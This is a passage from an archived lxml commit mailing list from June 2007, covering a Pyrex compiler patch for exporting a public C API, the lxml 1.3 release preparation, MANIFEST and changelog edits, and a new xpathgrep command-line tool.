entry.type.declaration_code(entry.cname, - dll_linkage = dll_linkage) -- if entry.visibility <> 'private': -+ if entry.visibility == 'private': -+ storage_class = "static " -+ elif entry.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s; /*proto*/" % ( - storage_class, - header)) -@@ -1090,6 +1113,63 @@ - code.putln( - "};") - -+ def generate_c_api_table(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry.cname) -+ if public_funcs: -+ env.use_utility_code(c_api_import_code); -+ code.putln( -+ "static __Pyx_CApiTabEntry %s[] = {" % -+ Naming.c_api_tab_cname) -+ public_funcs.sort() -+ for entry_cname in public_funcs: -+ code.putln('{"%s", %s},' % (entry_cname, entry_cname)) -+ code.putln( -+ "{0, 0}") -+ code.putln( -+ "};") -+ -+ def generate_c_api_import_code(self, env, h_code): -+ # this is written to the header file! -+ h_code.put(""" -+ /* Return -1 and set exception on error, 0 on success. */ -+ static int -+ import_%(name)s(PyObject *module) -+ { -+ if (module != NULL) { -+ PyObject *c_api_init = PyObject_GetAttrString( -+ module, "_import_c_api"); -+ if (!c_api_init) -+ return -1; -+ if (PyCObject_Check(c_api_init)) -+ { -+ int (*init)(struct {const char *s; const void **p;}*) = -+ PyCObject_AsVoidPtr(c_api_init); -+ if (!init) { -+ PyErr_SetString(PyExc_RuntimeError, -+ "module returns NULL pointer for C API call"); -+ return -1; -+ } -+ init(_%(name)s_API); -+ } -+ Py_DECREF(c_api_init); -+ } -+ return 0; -+ } -+ """.replace('\n ', '\n') % {'name' : env.module_name}) -+ -+ def generate_c_api_init_code(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry) -+ if public_funcs: -+ code.putln('if (__Pyx_InitCApi(%s) < 0) %s' % ( -+ Naming.module_cname, -+ code.error_goto(self.pos))) -+ - def generate_filename_init_prototype(self, code): - code.putln(""); - code.putln("static void %s(void); /*proto*/" % Naming.fileinit_cname) -@@ -1109,6 +1189,8 @@ - self.generate_intern_code(env, code) - #code.putln("/*--- String init code ---*/") - self.generate_string_init_code(env, code) -+ #code.putln("/*--- External C API setup code ---*/") -+ self.generate_c_api_init_code(env, code) - #code.putln("/*--- Global init code ---*/") - self.generate_global_init_code(env, code) - #code.putln("/*--- Type import code ---*/") -@@ -1862,10 +1944,12 @@ - dll_linkage = None - header = self.return_type.declaration_code(entity, - dll_linkage = dll_linkage) -- if self.visibility <> 'private': -+ if self.visibility == 'private': -+ storage_class = "static " -+ elif self.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s {" % ( - storage_class, - header)) -@@ -3550,6 +3634,7 @@ - - utility_function_predeclarations = \ - """ -+typedef struct {const char *s; const void **p;} __Pyx_CApiTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s;} __Pyx_InternTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s; long n;} __Pyx_StringTabEntry; /*proto*/ - static PyObject *__Pyx_UnpackItem(PyObject *, Py_ssize_t); /*proto*/ -@@ -3572,6 +3657,8 @@ - static PyObject *__Pyx_CreateClass(PyObject *bases, PyObject *dict, PyObject *name, char *modname); /*proto*/ - static int __Pyx_InternStrings(__Pyx_InternTabEntry *t); /*proto*/ - static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); /*proto*/ -+static int __Pyx_InitCApi(PyObject *module); /*proto*/ -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t); /*proto*/ - """ - - get_name_predeclaration = \ -@@ -4056,3 +4143,37 @@ - """; - - #------------------------------------------------------------------------------------ -+ -+c_api_import_code = \ -+""" -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t) { -+ __Pyx_CApiTabEntry *api_t; -+ while (t->s) { -+ if (*t->s == '\0') -+ continue; /* shortcut for erased string entries */ -+ api_t = %(API_TAB)s; -+ while ((api_t->s) && (strcmp(api_t->s, t->s) < 0)) -+ ++api_t; -+ if ((!api_t->p) || (strcmp(api_t->s, t->s) != 0)) { -+ PyErr_Format(PyExc_ValueError, -+ "Unknown function name in C API: %%s", t->s); -+ return -1; -+ } -+ *t->p = api_t->p; -+ ++t; -+ } -+ return 0; -+} -+ -+static int __Pyx_InitCApi(PyObject *module) { -+ int result; -+ PyObject* cobj = PyCObject_FromVoidPtr(&__Pyx_ImportModuleCApi, NULL); -+ if (!cobj) -+ return -1; -+ -+ result = PyObject_SetAttrString(module, "_import_c_api", cobj); -+ Py_DECREF(cobj); -+ return result; -+} -+""" % {'API_TAB' : Naming.c_api_tab_cname} -+#------------------------------------------------------------------------------------ -Index: Pyrex/Compiler/Naming.py -=================================================================== ---- Pyrex/Compiler/Naming.py (Revision 151) -+++ Pyrex/Compiler/Naming.py (Arbeitskopie) -@@ -50,5 +50,6 @@ - self_cname = pyrex_prefix + "self" - stringtab_cname = pyrex_prefix + "string_tab" - vtabslot_cname = pyrex_prefix + "vtab" -+c_api_tab_cname = pyrex_prefix + "c_api_tab" - - extern_c_macro = pyrex_prefix.upper() + "EXTERN_C" From scoder at codespeak.net Sat Jun 23 09:46:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:46:52 +0200 (CEST) Subject: [Lxml-checkins] r44464 - lxml/trunk Message-ID: <20070623074652.D32F3813E@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:46:52 2007 New Revision: 44464 Removed: lxml/trunk/Pyrex-0.9.4.1-public-api.patch Log: drop Pyrex patch - not sufficient anyway Deleted: /lxml/trunk/Pyrex-0.9.4.1-public-api.patch ============================================================================== --- /lxml/trunk/Pyrex-0.9.4.1-public-api.patch Sat Jun 23 09:46:52 2007 +++ (empty file) @@ -1,239 +0,0 @@ -Index: Pyrex/Compiler/Nodes.py -=================================================================== ---- Pyrex/Compiler/Nodes.py (Revision 151) -+++ Pyrex/Compiler/Nodes.py (Arbeitskopie) -@@ -114,24 +114,28 @@ - self.generate_h_code(env, result) - - def generate_h_code(self, env, result): -- public_vars_and_funcs = [] -+ public_vars = [] -+ public_funcs = [] - public_extension_types = [] - for entry in env.var_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_vars.append(entry) - for entry in env.cfunc_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_funcs.append(entry) - for entry in env.c_class_entries: - if entry.visibility == 'public': - public_extension_types.append(entry) -- if public_vars_and_funcs or public_extension_types: -+ if public_vars or public_funcs or public_extension_types: - result.h_file = replace_suffix(result.c_file, ".h") - result.i_file = replace_suffix(result.c_file, ".pxi") - h_code = Code.CCodeWriter(result.h_file) - i_code = Code.PyrexCodeWriter(result.i_file) -+ header_barrier = "__HAS_PYX_" + env.module_name -+ h_code.putln("#ifndef %s" % header_barrier) -+ h_code.putln("#define %s" % header_barrier) - self.generate_extern_c_macro_definition(h_code) -- for entry in public_vars_and_funcs: -+ for entry in public_vars: - h_code.putln("%s %s;" % ( - Naming.extern_c_macro, - entry.type.declaration_code( -@@ -141,7 +145,23 @@ - for entry in public_extension_types: - self.generate_cclass_header_code(entry.type, h_code) - self.generate_cclass_include_code(entry.type, i_code) -+ if public_funcs: -+ for entry in public_funcs: -+ h_code.putln( -+ 'static %s;' % -+ entry.type.declaration_code("(*%s)" % entry.cname)) -+ i_code.putln("cdef extern %s" % -+ entry.type.declaration_code(entry.cname, pyrex = 1)) -+ h_code.putln( -+ "static struct {char *s; void **p;} _%s_API[] = {" % -+ env.module_name) -+ for entry in public_funcs: -+ h_code.putln('{"%s", &%s},' % (entry.cname, entry.cname)) -+ h_code.putln("{0, 0}") -+ h_code.putln("};") -+ self.generate_c_api_import_code(env, h_code) - h_code.putln("PyMODINIT_FUNC init%s(void);" % env.module_name) -+ h_code.putln("#endif /* %s */" % header_barrier) - - def generate_cclass_header_code(self, type, h_code): - #h_code.putln("extern DL_IMPORT(PyTypeObject) %s;" % type.typeobj_cname) -@@ -180,6 +200,7 @@ - self.body.generate_function_definitions(env, code) - self.generate_interned_name_table(env, code) - self.generate_py_string_table(env, code) -+ self.generate_c_api_table(env, code) - self.generate_typeobj_definitions(env, code) - self.generate_method_table(env, code) - self.generate_filename_init_prototype(code) -@@ -437,10 +458,12 @@ - dll_linkage = None - header = entry.type.declaration_code(entry.cname, - dll_linkage = dll_linkage) -- if entry.visibility <> 'private': -+ if entry.visibility == 'private': -+ storage_class = "static " -+ elif entry.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s; /*proto*/" % ( - storage_class, - header)) -@@ -1090,6 +1113,63 @@ - code.putln( - "};") - -+ def generate_c_api_table(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry.cname) -+ if public_funcs: -+ env.use_utility_code(c_api_import_code); -+ code.putln( -+ "static __Pyx_CApiTabEntry %s[] = {" % -+ Naming.c_api_tab_cname) -+ public_funcs.sort() -+ for entry_cname in public_funcs: -+ code.putln('{"%s", %s},' % (entry_cname, entry_cname)) -+ code.putln( -+ "{0, 0}") -+ code.putln( -+ "};") -+ -+ def generate_c_api_import_code(self, env, h_code): -+ # this is written to the header file! -+ h_code.put(""" -+ /* Return -1 and set exception on error, 0 on success. */ -+ static int -+ import_%(name)s(PyObject *module) -+ { -+ if (module != NULL) { -+ PyObject *c_api_init = PyObject_GetAttrString( -+ module, "_import_c_api"); -+ if (!c_api_init) -+ return -1; -+ if (PyCObject_Check(c_api_init)) -+ { -+ int (*init)(struct {const char *s; const void **p;}*) = -+ PyCObject_AsVoidPtr(c_api_init); -+ if (!init) { -+ PyErr_SetString(PyExc_RuntimeError, -+ "module returns NULL pointer for C API call"); -+ return -1; -+ } -+ init(_%(name)s_API); -+ } -+ Py_DECREF(c_api_init); -+ } -+ return 0; -+ } -+ """.replace('\n ', '\n') % {'name' : env.module_name}) -+ -+ def generate_c_api_init_code(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry) -+ if public_funcs: -+ code.putln('if (__Pyx_InitCApi(%s) < 0) %s' % ( -+ Naming.module_cname, -+ code.error_goto(self.pos))) -+ - def generate_filename_init_prototype(self, code): - code.putln(""); - code.putln("static void %s(void); /*proto*/" % Naming.fileinit_cname) -@@ -1109,6 +1189,8 @@ - self.generate_intern_code(env, code) - #code.putln("/*--- String init code ---*/") - self.generate_string_init_code(env, code) -+ #code.putln("/*--- External C API setup code ---*/") -+ self.generate_c_api_init_code(env, code) - #code.putln("/*--- Global init code ---*/") - self.generate_global_init_code(env, code) - #code.putln("/*--- Type import code ---*/") -@@ -1862,10 +1944,12 @@ - dll_linkage = None - header = self.return_type.declaration_code(entity, - dll_linkage = dll_linkage) -- if self.visibility <> 'private': -+ if self.visibility == 'private': -+ storage_class = "static " -+ elif self.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s {" % ( - storage_class, - header)) -@@ -3550,6 +3634,7 @@ - - utility_function_predeclarations = \ - """ -+typedef struct {const char *s; const void **p;} __Pyx_CApiTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s;} __Pyx_InternTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s; long n;} __Pyx_StringTabEntry; /*proto*/ - static PyObject *__Pyx_UnpackItem(PyObject *, Py_ssize_t); /*proto*/ -@@ -3572,6 +3657,8 @@ - static PyObject *__Pyx_CreateClass(PyObject *bases, PyObject *dict, PyObject *name, char *modname); /*proto*/ - static int __Pyx_InternStrings(__Pyx_InternTabEntry *t); /*proto*/ - static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); /*proto*/ -+static int __Pyx_InitCApi(PyObject *module); /*proto*/ -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t); /*proto*/ - """ - - get_name_predeclaration = \ -@@ -4056,3 +4143,37 @@ - """; - - #------------------------------------------------------------------------------------ -+ -+c_api_import_code = \ -+""" -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t) { -+ __Pyx_CApiTabEntry *api_t; -+ while (t->s) { -+ if (*t->s == '\0') -+ continue; /* shortcut for erased string entries */ -+ api_t = %(API_TAB)s; -+ while ((api_t->s) && (strcmp(api_t->s, t->s) < 0)) -+ ++api_t; -+ if ((!api_t->p) || (strcmp(api_t->s, t->s) != 0)) { -+ PyErr_Format(PyExc_ValueError, -+ "Unknown function name in C API: %%s", t->s); -+ return -1; -+ } -+ *t->p = api_t->p; -+ ++t; -+ } -+ return 0; -+} -+ -+static int __Pyx_InitCApi(PyObject *module) { -+ int result; -+ PyObject* cobj = PyCObject_FromVoidPtr(&__Pyx_ImportModuleCApi, NULL); -+ if (!cobj) -+ return -1; -+ -+ result = PyObject_SetAttrString(module, "_import_c_api", cobj); -+ Py_DECREF(cobj); -+ return result; -+} -+""" % {'API_TAB' : Naming.c_api_tab_cname} -+#------------------------------------------------------------------------------------ -Index: Pyrex/Compiler/Naming.py -=================================================================== ---- Pyrex/Compiler/Naming.py (Revision 151) -+++ Pyrex/Compiler/Naming.py (Arbeitskopie) -@@ -50,5 +50,6 @@ - self_cname = pyrex_prefix + "self" - stringtab_cname = pyrex_prefix + "string_tab" - vtabslot_cname = pyrex_prefix + "vtab" -+c_api_tab_cname = pyrex_prefix + "c_api_tab" - - extern_c_macro = pyrex_prefix.upper() + "EXTERN_C" From scoder at codespeak.net Sat Jun 23 09:48:39 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:48:39 +0200 (CEST) Subject: [Lxml-checkins] r44465 - lxml/trunk/src/lxml Message-ID: <20070623074839.7C27D813E@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:48:39 2007 New Revision: 44465 Modified: lxml/trunk/src/lxml/xmlerror.pxi Log: comment Modified: lxml/trunk/src/lxml/xmlerror.pxi ============================================================================== --- lxml/trunk/src/lxml/xmlerror.pxi (original) +++ lxml/trunk/src/lxml/xmlerror.pxi Sat Jun 23 09:48:39 2007 @@ -480,7 +480,9 @@ # Constants are stored in tuples of strings, for which Pyrex generates very # efficient setup code. To parse them, iterate over the tuples and parse each -# line in each string independently. +# line in each string independently. Tuples of strings (instead of a plain +# string) are required as some C-compilers of a certain well-known OS vendor +# cannot handle strings that are a few thousand bytes in length. cdef object __ERROR_LEVELS __ERROR_LEVELS = ("""\ From scoder at codespeak.net Sat Jun 23 22:41:15 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 22:41:15 +0200 (CEST) Subject: [Lxml-checkins] r44476 - in lxml/branch/lxml-1.3: . doc Message-ID: <20070623204115.2004180A9@code0.codespeak.net> Author: scoder Date: Sat Jun 23 22:41:13 2007 New Revision: 44476 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/main.txt Log: prepare release of 1.3 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Sat Jun 23 22:41:13 2007 @@ -2,8 +2,8 @@ lxml changelog ============== -Under development -================= +1.3 (2007-06-24) +================ Features added -------------- Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Sat Jun 23 22:41:13 2007 @@ -129,7 +129,7 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). +The latest version is `lxml 1.3`_, released 2007-06-24 (`changes for 1.3`_). `Older versions`_ are listed below. .. _`Older versions`: #old-versions From scoder at codespeak.net Sun Jun 24 12:31:54 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 12:31:54 +0200 (CEST) Subject: [Lxml-checkins] r44478 - lxml/tag/lxml-1.3 Message-ID: <20070624103154.CD4CE80E9@code0.codespeak.net> Author: scoder Date: Sun Jun 24 12:31:53 2007 New Revision: 44478 Added: lxml/tag/lxml-1.3/ - copied from r44477, lxml/branch/lxml-1.3/ Log: 1.3 release tag From scoder at codespeak.net Sun Jun 24 13:59:04 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 13:59:04 +0200 (CEST) Subject: [Lxml-checkins] r44479 - in lxml/trunk: . doc Message-ID: <20070624115904.263F1811E@code0.codespeak.net> Author: scoder Date: Sun Jun 24 13:59:02 2007 New Revision: 44479 Modified: lxml/trunk/CHANGES.txt lxml/trunk/doc/main.txt Log: release merges from 1.3 Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Sun Jun 24 13:59:02 2007 @@ -2,12 +2,25 @@ lxml changelog ============== -Under Development +Under development ================= Features added -------------- +Bugs fixed +---------- + +Other changes +------------- + + +1.3 (2007-06-24) +================ + +Features added +-------------- + * Parsers take a ``remove_comments`` keyword argument that skips over comments * Entity support through an ``Entity`` factory and element classes. XML Modified: lxml/trunk/doc/main.txt ============================================================================== --- lxml/trunk/doc/main.txt (original) +++ lxml/trunk/doc/main.txt Sun Jun 24 13:59:02 2007 @@ -129,7 +129,7 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). +The latest version is `lxml 1.3`_, released 2007-06-24 (`changes for 1.3`_). `Older versions`_ are listed below. .. _`Older versions`: #old-versions From scoder at codespeak.net Sun Jun 24 14:00:43 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 14:00:43 +0200 (CEST) Subject: [Lxml-checkins] r44480 - lxml/trunk Message-ID: <20070624120043.1D871811E@code0.codespeak.net> Author: scoder Date: Sun Jun 24 14:00:42 2007 New Revision: 44480 Modified: lxml/trunk/MANIFEST.in Log: only integrate the necessary Pyrex modules Modified: lxml/trunk/MANIFEST.in ============================================================================== --- lxml/trunk/MANIFEST.in (original) +++ lxml/trunk/MANIFEST.in Sun Jun 24 14:00:42 2007 @@ -9,6 +9,8 @@ recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc -recursive-include Pyrex *.py +include Pyrex/__init__.py +recursive-include Pyrex/Compiler *.py +recursive-include Pyrex/Distutils *.py include doc/mkhtml.py doc/rest2html.py exclude doc/pyrex.txt src/lxml/etree.pxi From scoder at codespeak.net Sun Jun 24 17:21:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 17:21:01 +0200 (CEST) Subject: [Lxml-checkins] r44483 - lxml/trunk Message-ID: <20070624152101.9C4D68125@code0.codespeak.net> Author: scoder Date: Sun Jun 24 17:21:01 2007 New Revision: 44483 Modified: lxml/trunk/MANIFEST.in Log: missing .c file in source archive Modified: lxml/trunk/MANIFEST.in ============================================================================== --- lxml/trunk/MANIFEST.in (original) +++ lxml/trunk/MANIFEST.in Sun Jun 24 17:21:01 2007 @@ -5,7 +5,7 @@ include MANIFEST.in version.txt include CHANGES.txt CREDITS.txt INSTALL.txt LICENSES.txt README.txt TODO.txt recursive-include src *.pyx *.pxd *.pxi *.py -recursive-include src/lxml etree.c objectify.c etree.h etree_defs.h +recursive-include src/lxml etree.c objectify.c pyclasslookup.c etree.h etree_defs.h recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc From scoder at codespeak.net Sun Jun 24 17:21:30 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 17:21:30 +0200 (CEST) Subject: [Lxml-checkins] r44484 - lxml/branch/lxml-1.3 Message-ID: <20070624152130.56E468125@code0.codespeak.net> Author: scoder Date: Sun Jun 24 17:21:29 2007 New Revision: 44484 Modified: lxml/branch/lxml-1.3/MANIFEST.in Log: missing .c file in source archive Modified: lxml/branch/lxml-1.3/MANIFEST.in ============================================================================== --- lxml/branch/lxml-1.3/MANIFEST.in (original) +++ lxml/branch/lxml-1.3/MANIFEST.in Sun Jun 24 17:21:29 2007 @@ -5,7 +5,7 @@ include MANIFEST.in version.txt include CHANGES.txt CREDITS.txt INSTALL.txt LICENSES.txt README.txt TODO.txt recursive-include src *.pyx *.pxd *.pxi *.py -recursive-include src/lxml etree.c objectify.c etree.h etree_defs.h +recursive-include src/lxml etree.c objectify.c pyclasslookup.c etree.h etree_defs.h recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc From scoder at codespeak.net Mon Jun 25 10:27:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 10:27:46 +0200 (CEST) Subject: [Lxml-checkins] r44497 - in lxml/trunk: . src/lxml Message-ID: <20070625082746.2A46C80F3@code0.codespeak.net> Author: scoder Date: Mon Jun 25 10:27:45 2007 New Revision: 44497 Modified: lxml/trunk/INSTALL.txt lxml/trunk/src/lxml/etree.pyx Log: comments on libxml2 versions Modified: lxml/trunk/INSTALL.txt ============================================================================== --- lxml/trunk/INSTALL.txt (original) +++ lxml/trunk/INSTALL.txt Mon Jun 25 10:27:45 2007 @@ -11,6 +11,8 @@ * libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html + If you want to use XPath reliably, try to avoid libxml2 2.6.27. + * libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Mon Jun 25 10:27:45 2007 @@ -1426,7 +1426,7 @@ FTP. Note that XInclude does not support custom resolvers in Python space - due to restrictions of libxml2 <= 2.6.28. + due to restrictions of libxml2 <= 2.6.29. """ cdef python.PyThreadState* state cdef int result From scoder at codespeak.net Mon Jun 25 10:27:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 10:27:56 +0200 (CEST) Subject: [Lxml-checkins] r44498 - lxml/trunk/tools Message-ID: <20070625082756.A501280F3@code0.codespeak.net> Author: scoder Date: Mon Jun 25 10:27:56 2007 New Revision: 44498 Added: lxml/trunk/tools/ lxml/trunk/tools/xpathgrep.py Log: new subdirectory to collect some command line tools Added: lxml/trunk/tools/xpathgrep.py ============================================================================== --- (empty file) +++ lxml/trunk/tools/xpathgrep.py Mon Jun 25 10:27:56 2007 @@ -0,0 +1,218 @@ +#!/usr/bin/env python + +import lxml.etree as et +import sys, os.path, optparse, itertools + +SHORT_DESCRIPTION = "An XPath file finder for XML files." + +__doc__ = SHORT_DESCRIPTION + ''' + +Evaluates an XPath expression against a series of files and prints the +matching subtrees to stdout. + +Examples:: + + $ cat test.xml + + + + + + + # find all leaf elements: + $ SCRIPT '//*[not(*)]' test.xml + + + + + # find all elements with attribute values containing "abc" ignoring case: + $ SCRIPT '//*[@*[contains(py:lower(.), "abc")]]' test.xml + + + + + # find all numeric attribute values: + $ SCRIPT '//@*[re:match(., "^[0-9]+$")]' test.xml + 1234 + + * find all elements with numeric attribute values: + $ SCRIPT '//*[@*[re:match(., "^[0-9]+$")]]' test.xml + + + * find all elements with numeric attribute values in more than one file: + $ SCRIPT '//*[@*[re:match(., "^[0-9]+$")]]' test.xml test.xml test.xml + >> test.xml + + >> test.xml + + >> test.xml + + + * find XML files that have non-empty root nodes: + $ SCRIPT -q '*' test.xml test.xml test.xml + >> test.xml + >> test.xml + >> test.xml + + * find out if an XML file has at most depth three: + $ SCRIPT 'not(/*/*/*)' test.xml + True + +'''.replace('SCRIPT', os.path.basename(sys.argv[0])) + +REGEXP_NS = "http://exslt.org/regular-expressions" +PYTHON_BUILTINS_NS = "PYTHON-BUILTINS" + +parser = et.XMLParser(remove_blank_text=True) + +def print_results(results): + if isinstance(results, basestring) or isinstance(results, bool): + print results + return + + for result in results: + if isinstance(result, basestring) or isinstance(result, bool): + print result + else: + print et.tostring( + result, + xml_declaration=False, + pretty_print=True) + +def find_in_file(f, xpath, print_name=True, xinclude=False): + if hasattr(f, 'name'): + filename = f.name + else: + filename = f + + try: + try: + tree = et.parse(f, parser) + except IOError, e: + print >> sys.stderr, "ERR: parsing %r failed: %s: %s" % ( + filename, e.__class__.__name__, e) + return False + + try: + if xinclude: + tree.xinclude() + except IOError, e: + print >> sys.stderr, "ERR: XInclude for %r failed: %s: %s" % ( + filename, e.__class__.__name__, e) + return False + + if not callable(xpath): + xpath = et.XPath(xpath) + + results = xpath(tree) + if results == []: + return False + if print_name: + print ">> %s" % f + if options.verbose: + print_results(results) + return True + except Exception, e: + print >> sys.stderr, "ERR: %r: %s: %s" % ( + filename, e.__class__.__name__, e) + return False + +def register_builtins(): + ns = et.FunctionNamespace(PYTHON_BUILTINS_NS) + for (name, builtin) in vars(__builtins__).iteritems(): + if callable(builtin): + if not name.startswith('_') and name == name.lower(): + ns[name] = builtin + + str_xpath = et.XPath("string()") + def lower(_, s): + if isinstance(s, list): + if not s: + return '' + s = s[0] + if not isinstance(s, basestring): + if isinstance(s, bool): + s = str(s) + else: + s = str_xpath(s) + return s.lower() + def upper(_, s): + if isinstance(s, list): + if not s: + return '' + s = s[0] + if not isinstance(s, basestring): + if isinstance(s, bool): + s = str(s) + else: + s = str_xpath(s) + return s.upper() + + ns["lower"] = lower + ns["upper"] = upper + + +def parse_options(): + from optparse import OptionParser + + usage = "usage: %prog [options] XPATH [FILE ...]" + + parser = OptionParser( + usage = usage, + version = "%prog using lxml.etree " + et.__version__, + description = SHORT_DESCRIPTION) + parser.add_option("-H", "--long-help", + action="store_true", dest="long_help", default=False, + help="a longer help text including usage examples") + parser.add_option("-i", "--xinclude", + action="store_true", dest="xinclude", default=False, + help="run XInclude on the file before XPath") + parser.add_option("--no-python", + action="store_false", dest="python", default=True, + help="disable Python builtins (prefix 'py')") + parser.add_option("--no-regexp", + action="store_false", dest="regexp", default=True, + help="disable regular expressions (prefix 're')") + parser.add_option("-q", "--quiet", + action="store_false", dest="verbose", default=True, + help="don't print status messages to stdout") + + options, args = parser.parse_args() + + if options.long_help: + parser.print_help() + print __doc__[__doc__.find('\n\n')+1:] + sys.exit(0) + + if len(args) < 1: + parser.error("first argument must be an XPath expression") + + return options, args + + +if __name__ == "__main__": + options, args = parse_options() + + namespaces = {} + if options.regexp: + namespaces["re"] = REGEXP_NS + if options.python: + register_builtins() + namespaces["py"] = PYTHON_BUILTINS_NS + + xpath = et.XPath(args[0], namespaces) + + found = False + if len(args) == 1: + found = find_in_file( + sys.stdin, xpath, print_name, options.xinclude) + else: + print_name = len(args) > 2 + for filename in itertools.islice(args, 1, None): + found |= find_in_file( + filename, xpath, print_name, options.xinclude) + + if found: + sys.exit(0) + else: + sys.exit(1) From scoder at codespeak.net Mon Jun 25 11:12:55 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 11:12:55 +0200 (CEST) Subject: [Lxml-checkins] r44499 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070625091255.DFEC880F1@code0.codespeak.net> Author: scoder Date: Mon Jun 25 11:12:54 2007 New Revision: 44499 Modified: lxml/branch/lxml-1.3/INSTALL.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: comments on libxml2 versions Modified: lxml/branch/lxml-1.3/INSTALL.txt ============================================================================== --- lxml/branch/lxml-1.3/INSTALL.txt (original) +++ lxml/branch/lxml-1.3/INSTALL.txt Mon Jun 25 11:12:54 2007 @@ -11,6 +11,8 @@ * libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html + If you want to use XPath reliably, try to avoid libxml2 2.6.27. + * libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Mon Jun 25 11:12:54 2007 @@ -1408,7 +1408,7 @@ FTP. Note that XInclude does not support custom resolvers in Python space - due to restrictions of libxml2 <= 2.6.28. + due to restrictions of libxml2 <= 2.6.29. """ cdef python.PyThreadState* state cdef int result From scoder at codespeak.net Mon Jun 25 15:54:47 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 15:54:47 +0200 (CEST) Subject: [Lxml-checkins] r44508 - lxml/trunk Message-ID: <20070625135447.10F7D80CD@code0.codespeak.net> Author: scoder Date: Mon Jun 25 15:54:46 2007 New Revision: 44508 Modified: lxml/trunk/CHANGES.txt Log: changelog consolidation Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Mon Jun 25 15:54:46 2007 @@ -8,6 +8,23 @@ Features added -------------- +* Entity support through an ``Entity`` factory and element classes. XML + parsers now have a ``resolve_entities`` keyword argument that can be set to + False to keep entities in the document. + +* ``column`` field on error log entries to accompany the ``line`` field + +* Error specific messages in XPath parsing and evaluation + NOTE: for evaluation errors, you will now get an XPathEvalError instead of + an XPathSyntaxError. To catch both, you can except on ``XPathError`` + +* The regular expression functions in XPath now support passing a node-set + instead of a string + +* Extended type annotation 